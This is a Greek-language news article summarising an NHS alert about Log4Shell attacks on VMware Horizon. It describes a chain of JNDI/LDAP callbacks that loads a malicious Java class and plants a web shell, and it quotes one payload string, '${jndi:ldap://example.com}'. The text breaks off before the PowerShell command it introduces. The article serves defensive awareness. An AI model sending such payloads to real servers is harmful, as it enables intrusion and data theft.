Η Εθνική Υπηρεσία Υγείας του Ηνωμένου Βασιλείου (NHS) δημοσίευσε μια προειδοποίηση στον κυβερνοχώρο για μια άγνωστη ομάδα απειλών που στοχεύει τις VMware Horizon με εκμεταλλεύσεις Log4Shell.
Το Log4Shell είναι ένα exploit για το CVE-2021-44228, ένα κρίσιμο αυθαίρετο ελάττωμα εκτέλεσης απομακρυσμένου κώδικα στο Apache Log4j 2.14, το οποίο βρίσκεται υπό ενεργή εκμετάλλευση μεγάλου όγκου και από τον Δεκέμβριο του 2021. Ο Apache αντιμετώπισε τις παραπάνω και τέσσερις ακόμη δευτερεύουσες ευπάθειες ενημερώσεις , και η έκδοση Log4j 2.17.1 θεωρείται πλέον επαρκώς ασφαλής.
Στόχευση του Apache Tomcat στο VMware Horizon
Σύμφωνα με την ανακοίνωση του NHS, ο hacker αξιοποιεί την εκμετάλλευση για να επιτύχει απομακρυσμένη εκτέλεση κώδικα σε ευάλωτες αναπτύξεις VMware Horizon σε δημόσια υποδομή.
“Η επίθεση πιθανότατα αποτελείται από μια φάση αναγνώρισης, όπου ο εισβολέας χρησιμοποιεί το Java Naming and Directory InterfaceTM (JNDI) μέσω ωφέλιμων φορτίων Log4Shell για να καλέσει πίσω σε κακόβουλη υποδομή”, εξηγεί η ειδοποίηση.
“Μόλις εντοπιστεί μια αδυναμία, η επίθεση χρησιμοποιεί το Lightweight Directory Access Protocol (LDAP) για να ανακτήσει και να εκτελέσει ένα κακόβουλο αρχείο κλάσης Java που εισάγει ένα κέλυφος web στην υπηρεσία VM Blast Secure Gateway.”
“Το κέλυφος Ιστού μπορεί στη συνέχεια να χρησιμοποιηθεί από έναν εισβολέα για να πραγματοποιήσει μια σειρά από κακόβουλες δραστηριότητες, όπως η ανάπτυξη πρόσθετου κακόβουλου λογισμικού, η εξαγωγή δεδομένων ή η ανάπτυξη ransomware.”
Ο hacker εκμεταλλεύεται την παρουσία της υπηρεσίας Apache Tomcat που είναι ενσωματωμένη στο VMware Horizon, η οποία είναι ευάλωτη στο Log4Shell.
Η εκμετάλλευση ξεκινά με το απλό και ευρέως χρησιμοποιούμενο ωφέλιμο φορτίο “${jndi:ldap://example.com}” και δημιουργεί την ακόλουθη εντολή PowerShell από την Tomcat.